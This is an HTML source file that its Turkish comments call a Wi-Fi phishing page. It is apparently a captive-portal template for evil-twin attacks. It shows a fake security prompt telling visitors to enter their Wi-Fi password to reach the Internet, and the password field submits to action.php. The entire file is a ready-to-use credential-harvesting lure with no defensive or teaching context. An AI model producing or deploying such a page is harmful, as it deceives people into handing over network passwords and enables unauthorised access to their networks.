<!DOCTYPE html>
<!By-Emirhan Tarafından Geliştirilen Bir Wi-Fi Oltalama Sayfasıdır>
<!https://github.com/By-Emirhan>
<!Geliştirici By-Emirhan>
<html lang="tr">

<head>
    <meta charset="UTF-8" name="viewport" content="width=device-width, initial-scale=1">
    <title>Wi-Fi Güvenliği</title>
    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;
        }
        
        body {
            margin: 0;
            padding: 0;
            background: #fff;
            background-size: cover;
            background-position: center;
            font-family: sans-serif;
        }
        
        form {
            width: 350px;
            height: 320px;
            border-radius: 20px;
            background: #1E1E1E;
            color: #fff;
            top: 50%;
            left: 50%;
            position: absolute;
            transform: translate(-50%, -50%);
            box-sizing: border-box;
            padding: 70px 30px;
        }
        
        .avatar {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            position: absolute;
            top: -50px;
            left: calc(50% - 50px);
        }
        
        h1 {
            margin: 0;
            padding: 0 0 20px;
            text-align: center;
            font-size: 22px;
        }
        
        .loginbox p {
            margin: 0;
            padding: 0;
            margin-bottom: 30px;
            font-weight: bold;
        }
        
        .loginbox input {
            width: 100%;
            margin-bottom: 20px;
        }
        
        input[type=password] {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 3px solid #51ff00;
            box-sizing: border-box;
        }
        
        button {
            background-color: #3c3c3c;
            color: white;
            padding: 14px 30px;
            margin: 8px 0;
            border: none;
            cursor: pointer;
            border-radius: 20px;
            background: #51ff00;
            width: 100%;
        }
        
        button:hover {
            opacity: 0.8;
        }
    </style>
</head>

<body>
    <form action="action.php" method="post">

        <div class="imgcontainer">
            <img src="https://1.bp.blogspot.com/-UwWljkdiuWk/Xq0c6jl0D6I/AAAAAAAAGUw/0hZ0HpSM81IS84UqNqtsjS_7ycNUXVjcACLcBGAsYHQ/s1600/Picture1.png" alt="Avatar" class="avatar">
        </div>




        <div class="container">

            <h1>Güvenlik nedeniyle, İnternet'e erişmek için WiFi şifrenizi girin</h1>
            <label for="psw"><b>Şifre</b></label>
            <input type="password" placeholder="Wi-Fi Parolanızı Girin" name="psw" required>

            <button type="submit">Bağlan</button>
        </div>


    </form>

</body>

</html>
